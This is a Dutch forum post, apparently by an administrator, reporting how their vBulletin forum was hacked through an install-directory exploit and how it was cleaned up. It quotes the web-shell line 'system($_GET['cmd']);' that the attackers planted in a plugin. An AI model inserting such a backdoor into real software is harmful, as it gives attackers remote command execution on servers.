Voor de meesten was het wel bekend maar afgelopen 9 september is het forum (net zoals vele anderen) gehackt via een tot nu toe onbekende exploit. Althans er is nog geen uitleg gegeven vanuit vBulletin zelf en er is ook nog geen patch voor. Maar het heeft iig te maken met iets wat in de install directory staat.
Er zijn nogal wat opmerkingen geweest over dat je na het installeren/updaten van vBulletin de install directory moet wissen maar tot nu toe adviseerde vbulletin alleen maar om install.php te wissen. Sterker nog, vBulletin werkte niet voordat je deze file had gewist. De waarschuwing van vBulletin op 27 augustus heb ik helaas gemist .
Inmiddels is bekend dat er honderden forums slachtoffer zijn geworden van deze exploit dus wat dat betreft zijn we niet de enigen. Wij hebben wel het geluk dat we er op tijd bij waren en dat we blijkbaar nog in de wacht stonden voor verdere penetratie. Vooralsnog zijn ze niet verder gekomen dan een geautomatiseerde/scripted entry op basis van de beschikbare exploit en waren er twee directories gewist, de directory met de banners en de directory met alle attachments.
Uiteraard zijn we na de meldingen gelijk aan de gang gegaan en hebben we na het verwijderen van het leuke 'call me maybe' daar waar nodig extra login barrières geplaatst (.htaccess). Geautomatiseerd waren er een aantal admin accounts aangemaakt die heel snel weer verwijderd zijn. De config.php files was nog niet aangepast wat bij vele andere forums wel is gebeurd en ook was er een custom plugin geïnstalleerd met dit als uitvoer 'system($_GET['cmd']);'. Deze functie zou via een bepaalde url toegankelijk zijn maar ook daar is tot aan het verwijderen geen gebruik van gemaakt.
Uiteindelijk zijn alles files overschreven met de laatste versie van vbulletin. Via een backup hebben we alle banners terug gezet. Helaas hebben we niet alle attachments terug kunnen plaatsen en missen we de attachments van de laatste week. Dit hebben we te danken aan Idera die twee weken geleden spontaan is met het backuppen van de web directory zonder daarvan een error achter te laten. Laat ik verder mijn mond maar houden over deze software.
Al met al kunnen we na uitvoerige onderzoeken van de server en de logfiles concluderen dat de wht server klaar stond om gehackt te worden maar is het vooralsnog gebleven bij deze geautomatiseerde preparatie. Er is dus geen gebruiker of enig andere informatie gestolen. Dit wil niet zeggen dat het verstandig is om af en toe je wachtwoord te veranderen en ook gebruik te maken van site specifieke wachtwoorden.
Tot slot wil ik het fantastische Jember Hacker Team bedanken voor deze ongeëvenaarde prestatie. Waar zou de wereld zijn zonder deze geweldenaren vraag je jezelf soms wel eens af.

Likes:
![Webhostingtalk.nl slachtoffer van vBulletin exploit en de gevolgen. [DON'T PANIC!]](https://www.webhostingtalk.nl/images/WHT_rd/misc/dT.png)

Quote